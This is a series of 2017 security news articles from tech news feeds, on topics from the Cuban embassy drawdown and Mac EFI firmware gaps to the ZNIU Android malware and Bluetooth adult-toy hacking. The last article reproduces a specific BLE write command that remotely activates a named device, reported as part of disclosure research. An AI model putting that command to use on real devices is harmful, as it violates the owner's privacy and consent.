STE WILLIAMS

US yanks staff from Cuban embassy over sonic death ray fears

The US State Department on Friday announced that it is pulling all non-essential staff and their families out of its embassy in Cuba following reports of a secret weapon being deployed against employees there.

In a communiqué, the department said that the embassy would be reduced to an emergency skeleton staff until future notice. It will restaff the embassy only after it receives assurances from the Cuban government guaranteeing the safety of its employees.

“In conjunction with the ordered departure of our diplomatic personnel, the Department has issued a Travel Warning advising US citizens to avoid travel to Cuba and informing them of our decision to draw down our diplomatic staff,” said Secretary of State Rex Tillerson.

“We have no reports that private US citizens have been affected, but the attacks are known to have occurred in US diplomatic residences and hotels frequented by US citizens. The Department does not have definitive answers on the cause or source of the attacks and is unable to recommend a means to mitigate exposure.”

For months now, rumors have been swirling about a secret acoustic weapon being deployed against US and Canadian embassies in Cuba. Staff reported ear complaints, hearing loss, dizziness, headache, fatigue, cognitive issues, and difficulty sleeping. Twenty-one staff members based both at the embassy and at a nearby hotel have reported health issues in the past year that are believed to stem from the attacks.

The Cuban government has repeatedly denied that it has anything to do with the issue, and has asked the US to send in the FBI to investigate. So far the US has not taken them up on the offer.

In a press conference following the announcement, state department officials said that they hadn’t ruled out the possibility that a third party is carrying out the attacks. However, they insist that it is the responsibility of the Cuban government to find and stop the attackers. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/09/29/us_yanks_staff_from_cuban_embassy/

Analyzing Cybersecurity’s Fractured Educational Ecosystem

We have surprisingly little data on how to evaluate infosec job candidates academic qualifications. That needs to change.

Every day, a common scenario plays out across the US. An information security employer receives a resume from a recent graduate and looks at the student’s academic qualifications. Folks in human resources then invariably start muttering to themselves, “Does this individual have the necessary qualifications to be a…?” (fill in the blank: penetration tester, security operations center analyst, developer, contractor).

In an industry where hard data is respected above all else, we have surprisingly little data on how to evaluate candidate qualifications. The only issue experts seem to agree on is that there is a major infosec skills shortage — although even here, there is disagreement on exact numbers (Cyberseek cites 746,858 currently employed, but Frost and Sullivan reports 1,692,000 currently employed). This means that when employers are trying to find usable guidance, rankings, or even certifications to assist in determining the quality of an academic program, and by proxy, the students and job candidates they produce, they’re out of luck.

The problem stems from the origins of security in academia. At different institutions, security-related classes emerged over the years in various disciplines, including computer science (CS), information systems (IS), and information technology (IT), as a tangent discipline in the service of broader departmental goals and curricula. In most cases, security education is still maintained within these disciplines. This program diversity makes it difficult for a single evaluation criterion to emerge that is general, yet still useful, within this diluted environment. Indeed, unlike CS, IT, and IS, there currently are no widely adopted academic accreditations for computing security at all.

Don’t Give Up  
The National Security Agency has three primary designations that institutions can apply for that will deem them as a Center of Academic Excellence (CAE). Currently, these designations are offered in three distinct areas: cyber defense (CD), cyber operations (CO), and research (R).

Nearly 170 academic institutions maintain at least one of the three National Security Agency designations listed above, but only the CAE-CD and CAE-CO maintain curricular requirements. On the surface, these designations may seem to be exactly what is needed; however, there are also some concerns with simply seeking out NSA-designated institutions. Due to the need to designate security programs that may be housed in CS, IS, IT, or dedicated computing security programs, the CAE-CD requirements are broad and primarily focused on defensive topics. As a result, these designations act more like a minimum barrier to entry in the area of infosec education and don’t provide a comparative criterion or any mapping to job functions. Moreover, they were initially created with the NSA’s goals and needs in mind, not necessarily matching those of an enterprise or more general security operation.

Indeed, this broadness, until recently, extended to the designation itself. Prior to a recent revision, the NSA CAE-CD designation was given at the institution level and not for a specific program. This meant that although institutions might have obtained this, they did not have to provide students a way to take the required courses, thereby making such a designation useless as an evaluation criterion. This highlights that just because a student attends a designated institution doesn’t mean they will receive the desired education.

The CAE-CO is a newer, more offensively focused, and also more stringent designation. However, it highlights one of the potential problems with the system as a whole. The NSA represents a unique employer, the Department of Defense, and has adapted the designation requirements to include aspects not often used or needed in industry. An example of this would be the CAE-CO requirements for Just War Theory. Most industry security professionals would agree that this is not part of their day-to-day responsibilities. None of the NSA designations focus on nongovernmental, industry requirements, particularly for roles such as penetration testing. And, without industry outreach, there doesn’t appear to be any solution on the near-term horizon.

It is important to note that accreditations alone will never totally solve this problem. There are other criteria that play a role in effective infosec programs. Faculty quality, extracurricular activities, and continuous communication within the industry, including internships, are all contributing factors to the overall student experience and their ultimate success within a program. This is where that infosec employer can find their edge; while most companies won’t be able to provide the grants and scholarships that the government does, they have the opportunity to serve as advisers to academic programs offering their feedback in exchange for mutually beneficial, hands-on internships. Using this vehicle, employers may be able to get the influence and data they need to make informed decisions about the quality or academic programs, accreditations, and, ultimately, mission-critical new hires for their teams.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Chaim Sanders is the Security Lead at ZeroFOX, which provides comprehensive social media protection for enterprises. Outside of ZeroFOX, he teaches for the computing security department at the Rochester Institute of Technology. His areas of interest include Web security, with … View Full Bio

Article source: https://www.darkreading.com/careers-and-people/analyzing-cybersecuritys-fractured-educational-ecosystem/a/d-id/1329980?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Apple Mac Models Vulnerable to Targeted Attacks

Several updated Mac models don’t receive EFI security fixes, putting machines at risk for targeted cyberattacks.

A systemic problem in several popular Apple Mac computer models is leaving machines vulnerable to stealthy and targeted cyberattacks.

Researchers at Duo Security analyzed 73,000 real-world Mac systems from users across industries over three years of OS updates. They found many don’t receive Extensible Firmware Interface (EFI) security fixes when they upgrade to the latest OS or download security updates, exposing them to threats like Thunderstrike 2 and Vault 7 data detailing attacks on firmware.

Attacks on the EFI layer, which boots and manages functions for hardware systems, are especially threatening because they give attackers a high level of privilege on target systems.

“At that layer, [attacks] can influence anything on the layers above,” says Rich Smith, director of RD at Duo. “You can really circumvent any security controls that may be in place … it’s ultimate power in terms of raw access to what the computer has to offer.”

“For the longest time, Apple didn’t do a lot to keep [EFI firmware] up-to-date, and it was very manual,” explains RD engineer Pepijn Bruienne. After Thunderstrike 1 was published in 2015, Apple recognized the danger and simplified its update process by deploying EFI fixes with OS upgrades.

The problem is, a significant number of machines do not receive EFI security updates when they upgrade their operating systems, meaning software is secure but firmware is exposed.

What’s the damage?

Researchers found major discrepancies between the versions of EFI running on analyzed systems, and the versions they should have been running.

Although only 4.2% of the Macs analyzed, overall, by Duo have an EFI firmware version different than what they ought to (based on their hardware, OS version, and the associated EFI update), certain models are faring worse than others.  

At least sixteen Mac models running a supported Apple OS have never received any EFI firmware updates. The most vulnerable model is the 21.5″ iMac, released in late 2015. Researchers found 43% of systems they analyzed are running the wrong EFI versions.

Users running a version of macOS/OS X older than the latest major release (High Sierra) likely have EFI firmware that has not received the latest fixes for EFI problems. Forty-seven Mac models capable of running OS versions 10.12, 10.11, and 10.10 did not have an EFI firmware patch for the Thunderstrike 1 vulnerability. Thirty-one models capable of running the same versions didn’t have a patch for remote version Thunderstrike 2. Two recent Apple security updates (2017-001 for El Capitan 10.10 and 10.11) had the wrong firmware.

“While we can see the discrepancies and see what is happening, we can’t necessarily see why it is happening,” says Bruienne. Researchers say there is something interfering with the way bundled EFI updates are installed, which is why some systems are running older EFI versions.

Danger to the enterprise

Firmware sits below the operating system, application code, and hypervisors. Low-level attacks targeting firmware put attackers at an advantage, explains Rich Smith, director of RD at Duo.

Each EFI vulnerability is unique so details vary, but in general they are exploited through physical local access to a machine and plugging in a specially created device to a port that uses DMA; for example, a Thunderbolt or Firewire connection. These are frequently called “evil maid” attacks with the exception of Thunderstrike 2, which was purely software-based.

“Attacking EFI can be considered a sophisticated attack that would be used by nation-states or industrial espionage threat actors, and not something we expect to be used indiscriminately,” says Smith.

These attacks are difficult to detect and tougher to remediate; even wiping the hard drive would not completely eliminate malware once it’s installed, says Duo RD director Rich Smith. “From an attacker’s perspective it’s very stealthy,” he notes. “It’s very difficult to remove a compromise on a system.”

While the implications are “quite severe” in terms of compromised EFI, those who should be most aware of this are people working in higher-security environments. Tech companies, governments, and hacktivists, for example, are at risk of being targeted.

Fixing the problem

Smith advises businesses to check they are running the latest version of EFI for their systems;  Duo released a tool today for conducting these checks. If possible, update to the latest version of the OS, 10.12.6, which will give the latest versions of Apple’s EFI firmware and patch against known software security problems.

If you cannot update to 10.12.6 for compatibility reasons or because your hardware cannot run it, you may not be able to run up-to-date EFI firmware. Check Duo’s research for a list of hardware that hasn’t received an EFI update.

Given EFI attacks are mostly used by advanced actors, consider whether your business includes this level of sophisticated adversary in your threat model. If these attacks are something you proactively secure against, think about how a system with compromised EFI could affect your environment, and how you could confirm the integrity of your Macs’ EFI firmware.

“In many situations, answers to those questions would be ‘badly’ and ‘we probably wouldn’t be able to,'” says Smith. In these cases, he suggests replacing Macs that cannot update their EFI firmware, or moving them into roles where they are not exposed. These would involve physically secure environments with controlled network access.

Duo informed Apple of their data in June and Smith says interactions with the company have been “very positive.” Apple has taken steps forward with the release of macOS 10.13 (High Sierra).

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/apple-mac-models-vulnerable-to-targeted-attacks/d/d-id/1330015?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Whole Foods Reports Credit Card Breach

The breach affects customers of certain Whole Foods taprooms and table-service restaurants.

Whole Foods is investigating a payment card breach after learning an unauthorized actor accessed payment card information used at taprooms and table-service restaurants, the company reports.

Shoppers who limit their Whole Foods purchases to groceries are likely not affected; taprooms and restaurants use a different point-of-sale system than primary stores. While most Whole Foods Market stores do not have these venues, the company advises customers to closely monitor their card statements and report unauthorized charges to the issuing bank.

Amazon.com transactions have not been affected as its systems don’t connect to those at Whole Foods. Earlier this year, Amazon bought the grocery chain for $13.7 billion.

Whole Foods has contacted law enforcement and is working with a cybersecurity forensics firm in an ongoing investigation.

Access the full notification here.  

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/whole-foods-reports-credit-card-breach/d/d-id/1330016?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Apple Shares More Data with US in First Half of 2017

Device-based data requests from government agencies dropped in the first half over last year, but Apple fulfilled a higher percentage of those requests, according to its transparency report.

Apple received 4,479 requests during the first half of 2017 for device-based data, such as which of its customers were tied to which devices, and provided the information 80% of the time when US government agencies made the request, according to the company’s transparency report released this week.

While the number of requests fell to 4,822 during the same period last year, the percentage of the fulfilled requests rose from 78%, according to Apple’s 2016 transparency report.

Meanwhile, US account-based requests, which generally involved cases where law enforcement agencies want information about the fraudulent use of Apple accounts, rose to 1,692 requests during the first half of the year – up from 1,363 requests last year, the 2017 and 2016 reports state. However, in both time periods, the percentage of requests fulfilled remained at 84%.

Apple fulfilled a higher percentage of device-based and account-based data requests in the first half of this year, compared with the level it shared on a worldwide basis, according to the 2017 report. On a global basis, 77% of device-based data requests were fulfilled and 80% of account-based data requests.

Read more about Apple’s 2017 first half transparency report here.

 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/cloud/apple-shares-more-data-with-us-in-first-half-of-2017/d/d-id/1330017?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Best and Worst Security Functions to Outsource

Which security functions are best handled by third parties, and which should be kept in-house? Experts weigh in.PreviousNext

(Image: 3D_creation via Shutterstock)

(Image: 3D_creation via Shutterstock)

Security teams need more advanced people than they can find or afford. For many, outsourcing has become key to bridging the skills gap and addressing tasks they lack budget or talent to do.

Dark Reading’s report “Surviving the IT Security Skills Shortage” found 45% of businesses don’t outsource any of their security functions. Nearly 30% outsource a few hard-to-find skills and services, and 22% outsource some security functions while relying on third-party service providers for others. Six percent outsource most of their security tasks to third parties.

It’s possible to outsource just about any security function, says IP Architects president John Pironti, but just because you can outsource doesn’t mean you should. The question, he says, is where do you want your team to focus its time and attention?

“You have to calibrate expectations of what a third party will provide,” he explains. “They will not have the same interest or passion in your world as you will.”

Some security functions are best left in-house, Pironti adds, because they require intimate knowledge of business infrastructure and processes. Organizations will continue to master this balance as security threats evolve and multiply.

Outsourcing is more involved than simply passing off responsibilities to other people, adds Ryan LaSalle, global managing director for growth and strategy at Accenture. You have to work with providers to manage the functions you’re outsourcing and how they’re being performed.

No matter which functions you outsource, it’s critical to define expectations and processes for your partner firm, says Pat Patterson, VP of enterprise security solutions at Optiv. Most of the time, companies end up disappointed because they didn’t communicate what they needed.

“The better you as a customer can define expectations and requirements, the more prepared you will be to leverage that relationship,” he explains.

Which functions to outsource, and which to handle in-house? Read on to see the experts’ list of the most common and beneficial security functions to outsource, as well as the tasks that should be kept in-house.

(Which functions do you outsource, or which are you considering outsourcing? Let’s keep the conversation going in the comments.)  

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

 

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full BioPreviousNext

Article source: https://www.darkreading.com/risk/best-and-worst-security-functions-to-outsource/d/d-id/1329995?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

iPhone X Face ID baffled by kids, twins, siblings, doppelgängers

Youngsters! Pfft. They all look alike!

No, really, they do if you’re the Face ID facial recognition system in Apple’s iPhone X. Specifically, twins, siblings and look-alikes can trip false authentications. Growing kids, with their morphing faces, also baffle the biometric authentication.

Apple said so in a guide (PDF) about Face ID security that it published on Wednesday.

Overall, Face ID is pretty resistant to letting the wrong person log into your phone, Apple said. The possibility of a random person being able to unlock your phone by looking at it is about 1 in 1 million. Not bad, particularly when you compare it with Touch ID, which can be fooled approximately 1 in 50,000 times, Apple says.

But the odds go out the window once you throw in twins, siblings, pre-teens and evil doppelgängers. From Apple’s security guide:

The probability of a false match is different for twins and siblings that look like you as well as among children under the age of 13, because their distinct facial features may not have fully developed. If you’re concerned about this, we recommend using a passcode to authenticate.

Of course, you don’t have to use Face ID instead of a passcode. And as we noted recently when covering how features in the new iOS 11 will perhaps create fresh headaches for law enforcement, there are reasons why you might prefer to have your phone set up to require a passcode over a biometric sign-on.

Namely, the history of court decisions in the US has tended to lean toward granting Fifth Amendment protection against forcing people to give up their passcodes, given that a passcode is something you know, and the Fifth Amendment protects people from testifying against themselves.

Similar thinking has meant that biometrics, including Touch ID, involve something you are, not something you know, making it kosher to force unlocking with finger swipes as far as the courts are concerned. (N.B. There are court decisions and court actions that haven’t synced up with those interpretations, including the ex-cop who’s suspected of child abuse image trafficking, won’t or can’t give up his passcodes, and is being jailed indefinitely until he does.)

At any rate, even if you do opt to use Face ID – granted, it can be a time-saver if your passcode is as pleasingly plump and considerably complex as it really should be – there are plenty of times when you still have to use a passcode to authenticate on the iPhone X. In its attempt to clarify questions about the security around iPhone X, Apple says you’re required to use a passcode when…

  • The device has just been turned on or restarted.
  • The device hasn’t been unlocked for more than 48 hours.
  • The passcode hasn’t been used to unlock the device in the last 156 hours (six and a half days) and Face ID has not unlocked the device in the last 4 hours.
  • The device has received a remote lock command.
  • After five unsuccessful attempts to match a face.
  • After initiating power off/Emergency SOS by pressing and holding either volume button and the side button simultaneously for 2 seconds.

That’s a list worth paying attention to. Given the soaring rate of forced warrantless device searches at the US border, it’s good to know how to quickly turn off Face ID (though do bear in mind that US Customs and Border Patrol guards may not take kindly to a lack of cooperation).

According to Gadget Hack, which says it gets its info from Craig Federighi, Apple’s senior vice president of software engineering, to disable Face ID in a pinch, just grip the buttons on both sides of an iPhone X when handing it over to another person:

Since a screenshot uses the side button and volume up together, we can assume he means you’d need to press all three buttons – side, volume up, and volume down – simultaneously. We’re not sure how long they would have to be pressed, but it should not take very long since speed is necessary when handing your device over.

On all other iPhone models in iOS 11, press the power button 5 times in a row to activate Emergency SOS, which will quickly disable Touch ID until a passcode is entered.

At any rate, one of the major questions asked about iPhone X Face ID hasn’t been about kids or siblings, per se; rather, it’s about facial recognition algorithms that are trained by white people on mostly white faces. Facial recognition algorithms have hence been found to be less accurate at identifying black faces.

According to its security guide, Apple has taken that into account. The company says that its facial recognition neural networks have been trained with over a billion images, representing people from around the world who hail from different genders, ages, ethnicities, and other factors. The networks have also been designed to work with hats, scarves, glasses, contact lenses, and many sunglasses, be the faces indoors or outdoors, or even if they’re in complete darkness.

Apple says that it’s also devoted an additional neural network that’s specifically been trained to spot and resist spoofing attacks via photos or masks.

Those who are nervous about the privacy of their facial biometrics will be glad to hear that face data won’t be leaving the iPhone X. It won’t be backed up by iCloud, for instance, which is good to hear, given how Apple’s online backup is targeted by so many creeps who phish passcodes in an attempt to get at intimate material in iCloud.

From the security guide:

Face ID data doesn’t leave your device, and is never backed up to iCloud or anywhere else. Only in the case that you wish to provide Face ID diagnostic data to AppleCare for support will this information be transferred from your device.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/O5dfPup3ZUY/

Android malware ZNIU exploits DirtyCOW vulnerability

Thanks to Jagadeesh Chandraiah of SophosLabs for his behind-the-scenes work on this article.

Last year, we told you about DirtyCOWa privilege escalation bug in the Linux kernel that allows ordinary users to turn themselves into all-powerful root users. It soon became clear that DirtyCOW didn’t just affect Linux running on Intel processors but was also exploitable on Android (a modified version of Linux) running on ARM chips too.

This raised the possibility of DirtyCOW being used to compromise phones and tablets.

SophosLabs has now found malware, dubbed ZNIU, that does exactly that.

Enter ZNIU

Victims have to stray beyond the safety of the Google Play walled garden to get ZNIU, so attackers trick them into downloading infected apps from untrusted sources with old-fashioned social engineering. This example of ZNIU comes packaged as a porn app:

ZNIU

After being installed the app exploits DirtyCOW to elevate its privileges, bypassing the restrictions that would normally stand in its way. Once it infects a device, ZNIU chats with its command and control servers to receive updates and orders. Command-and-control servers are consulted whenever the infected device is connected to a power outlet or there’s a change in connectivity.

Malicious code contained in APKs (Android Application Packages) is downloaded from remote servers and executed at runtime in the hope of avoiding early detection from malware scanners.

ZNIU also creates a backdoor that can be used for future remote-controlled attacks and has the ability to send SMS messages, which opens the door for money making schemes such as sending spam, phishing or messaging premium rate numbers owned by the attacker.

The malware also collects device data:

ZNIU collecting device details

The DirtyCOW vulnerability

By successfully exploiting the DirtyCOW bug (known officially as CVE-2016-5195), ZNIU is able to grant itself all the permissions it needs to do harm without having to ask the user, or trick them.

The bug is explained in the Red Hat bug database like this:

A race condition was found in the way Linux kernel’s memory subsystem handled breakage of the read only private mappings COW situation on write access.

An unprivileged local user could use this flaw to gain write access to otherwise read only memory mappings and thus increase their privileges on the system.

In other words, the Linux Copy On Write mechanism can be tricked into overwriting a read-only file, which is something of a security catastrophe if that read-only file is a critical system executable or configuration file.

For a comprehensive explanation of DirtCOW, check out Paul Ducklin’s excellent article – Linux kernel bug: DirtyCOW “easyroot” hole and what you need to know.

What to do

The good news is that ZNIU isn’t available on Google Play and only works on devices running older versions of Android that aren’t patched against DirtyCOW. 

Google released a patch for Android way back in December but, sadly, the Android ecosystem is badly fragmented and whether or not you get updates is up to your vendor, not Google. Different vendors will release patches at different times and some may not release them at all.

So just because there’s a patch for DirtyCOW, that doesn’t mean you’ve got it. What we can say for sure is that users of the latest version of the Android operating system, Oreo, have nothing to worry about and that Sophos Mobile customers are protected (Sophos detects ZNIU as Andr/Rootnik-AI and Andr/ZNIU-A.)

If you’re concerned about your device, please contact your vendor.

Another tale of patches unapplied

History is littered with cases where attacks and outbreaks have happened because patches were available but weren’t applied. There’s no better example in recent history than the WannaCry outbreak in May 2017. At the time, we noted that it its spread was made possible in part by the unheeded lessons of the past, such as Slammer and Conficker.

The DirtyCOW hole was plugged a year ago so please make sure you have the latest security updates on your phone or tablet.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/jagbJ6cavWg/

Citrix patches Netscaler hole, ARM TrustZone twisted, Android Dirty COW exploited – and more security fails

Roundup As ever, it has been a busy week on the security front with good news, some very bad reports, corporate failings all round and troubling signs ahead for those worried about government intrusion in the online world.

Here’s El Reg‘s take on the resulting wreckage.

Cloudflare opens up protection

Among the good news Cloudflare says it will be giving all customers “Unmetered Mitigation” against DDoS attacks, meaning anyone who subscribes will now get the full protection afforded by the edge network provider, rather than having to pay based on volume of protected traffic.

Cloudflare CEO Matthew Prince reasons it’s wrong of his firm to charge users based on the size of the person attacking them, or let them get knocked offline because they can’t afford to guard against huge volumes.

“DDoS attacks are, quite simply, a plague on the Internet and it’s wrong to surprise customers with higher bills when they are targeted by one,” Prince said.

“With Unmetered Mitigation, we’re breaking the industry’s practice of surge pricing when someone comes under attack. It was an easy decision for us because it’s the right thing to do.”

Malware mutterings

In malware news Trend Micro spotted the first Android malware sample that tries to exploit the Dirty COW Linux kernel vulnerability that emerged last December. The ZNIU malware popped up across the world installed in over 300,000 apps that were spammed out to stores around the world.

In all around 5,000 unlucky and unpatched Android users got a taste of ZNIU, but it was Chinese users suffered most. The malware cost them dearly by sending out premium-rate SMS messages and deleting any evidence it was doing so.

Google is trying to use machine learning to spot such malware before it becomes an issue. At the Structure Security conference in San Francisco on Tuesday the company’s head of Android security Adrian Ludwig reported considerable success, with the Chocolate Factory claiming its AI systems spotted only five per cent of malware samples at the start of the year compared to 55 per cent now.

It wasn’t just threats to Android that surfaced this week. Cisco’s Talos Security team spotted a very nasty bit of code going after the bank accounts of Brazilian computer users – the first to be found written in Delphi.

The malware was signed with a legitimate VMware digital signature and used this to worm onto computers and then download a full suite of financial fraud tools. These stole credentials to some of Brazil’s most popular banks using fake webpages and keyloggers.

Bugs bork apps n’chips

Citrix said on Monday the Netscaler and SD-WAN issue that prompted it to halt software downloads last week was an authentication bypass in its management interface. The software maker released a patch along with remediation advice on Monday in an advisory here.

Cisco also had issues with its Umbrella Virtual Appliance Version 2.0.3 software, after an undocumented encrypted remote support tunnel (SSH) was found in the code. Cisco said that it had been put there for remote support by its staff but, as it hadn’t mentioned this in the documentation, was reporting it as a vulnerability.

“While Cisco has NO indications that our remote support SSH hubs have ever been compromised, Cisco has made significant changes to the behavior of the remote support tunnel capability to further secure the feature,” it said.

Also this week an interesting side-channel attack against ARM’s TrustZone popped up. The TrustZone is the chip firm’s supposedly secure data haven contained on its latest silicon. Usually side-channel attacks need physical access to the target device, but not all the time.

Researchers subverted the energy management systems of a Nexus 6 phone and were able to read data moving in TrustZone just by measuring power output. They then injected attack code of their own. The technique also appears to be transferable to other ARM-powered systems, just to make matters worse.

However, there was good news for macOS users who have upgraded to the High Sierra operating system. The new code has an eficheck function that will check the firmware of the Extensible Firmware Interface to make sure nothing has been tampered with.

Snoopy snoopy sneak sneak

Police use of fake mobile phone masts dubbed “Stingrays” might be slightly better regulated in the future thanks to a court ruling on Thursday. An appeals court in Washington ruled that their use requires a warrant – something the police have fought vociferously against.

Law enforcement in the US has spent over $100m on such devices and while states and politicians are trying to limit Stingray, governments show no sign of backing down. The case will probably now go to the Supremes.

Meanwhile the American Civil Liberties Union is fighting an data-harvesting request from the Department of Justice into who isn’t keen on President Trump. The DoJ wants the names of 6,000 people who signed up to an anti-Trump website before the inauguration.

A gag order prevented Facebook discussing the case, but The Social Network™ fought and won. The case is ongoing, but based on past experience the government may have been overreaching itself again.

Storefront fails

Amazon’s efforts to remake grocery chain Whole Paycheck Foods encountered a setback when malware was discovered on some of its point-of-sale terminals.

Thankfully the damage was limited to the in-store restaurants and taprooms (pubs) in Whole Foods, which don’t share terminals with the main grocery system. So far there’s no word on how many customers have been affected.

Not so at Sonic, the US purveyor of fast food. Earlier in the week security blogger Brian Krebs discovered a cache of five million credit cards offered for sale online. They turned out to be sourced from customers of the burger slingers eateries.

The company has confirmed that an attack on its POS terminals was successful but didn’t say how many people were affected. Given the chain has over 3,500 outlets it’s perfectly possible that the archive was all from its customers.

And finally, secure messaging app Telegram’s CEO has said Russia’s spies demanded the decryption keys for his messaging app, and Apple has published [PDF] its latest surveillance transparency report: yup, governments are still demanding data on some fanbois. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/09/29/weekly_security_roundup/

Dildon’ts of Bluetooth: Pen test boffins sniff out Berlin’s smart butt plugs

Security researchers have figured out how to locate and exploit smart adult toys.

Various shenanigans are possible because of the easy discoverability and exploitability of internet-connected butt plugs and the like running Bluetooth’s baby brother, Bluetooth Low Energy (BLE), a wireless personal area network technology. The tech has support for security but it’s rarely implemented in practice, as El Reg has noted before.

The shortcoming allowed boffins at Pen Test Partners to hunt for Bluetooth adult toys, a practice it dubbed screwdriving, in research that builds on its earlier investigation into Wi-Fi camera dildo hacking earlier this year.

BLE devices also advertise themselves for discovery. The Lovense Hush, an IoT-enabled butt plug, calls itself LVS-Z001. Other Hush devices use the same identifier.

The Hush, like every other sex toy tested by PTP (the Kiiroo Fleshlight, Lelo, Lovense Nora and Max), all lacked adequate PIN or password protection. If the devices did have a PIN it was generic (0000 / 1234 etc). This omission is for understandable reasons. PTP explains: “The challenge is the lack of a UI to enter a classic Bluetooth pairing PIN. Where do you put a UI on a butt plug, after all?”

The only protection is that BLE devices will generally only pair with one device at a time and their range is limited.

By walking down a regular Berlin street with a Bluetooth sniffer, a PTP researcher was able to discover a number of Lovense sex toys, identifiable from their identifiers, through passive reconnaissance.

Mischievous hackers could go easily go one step further and turn on the device using commands easily derived from an examination of the kit.

The associated app causes the Hush to start vibrating when the handle 0x000e has “Vibrate:5” written to it.

A hacker “could drive the Hush’s motor to full speed, and as long as the attacker remains connected over BLE and not the victim, there is no way they can stop the vibrations.” Ooh err missus.

PTP concludes that it has identified a legitimate privacy issue which deserves public attention and red faces all round. “Having an adult toy unexpectedly start vibrating could cause a great deal of embarrassment in some situations.”

The issue goes beyond the niche technology of internet-enabled sex toys. The latest versions of some hearing aids also support BLE. One such device was used by a father of a PTP researcher.

“I managed to find them broadcasting whilst we were having lunch one day,” PTP researcher Alex Lomas wrote. “They have BLE in them to allow you to play back music, but also control and adjust their settings (like if you’re in a noisy restaurant or a concert hall). These things cost £3,500 and need to be programmed by an audiologist so not only could an attacker damage or deprive someone of their hearing, but it’s going to cost them to get it fixed.”

PTP’s research on BLE device insecurity – together with recommendations on how to shore them up – can be found here.

BLE advertises its presence. As a result, these toys can be located fairly accurately using triangulation. The potential privacy issues this throws up might be mitigated by using a generic BLE device name for, ahem, adult toys and other kit people might not necessarily want world+dog to stumble on.

In some ways the development of Bluetooth technology is making the risk more severe.

The specification for Bluetooth 4.0 allows for only one concurrent master and slave connection at once, so a device can’t be hijacked once it is paired with a smartphone. However, Bluetooth 4.2 changes this so that slaves are permitted to have physical links to more than one master at a time, opening the door for rogue devices to talk to and control devices. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/09/29/ble_exploits_screwdriving/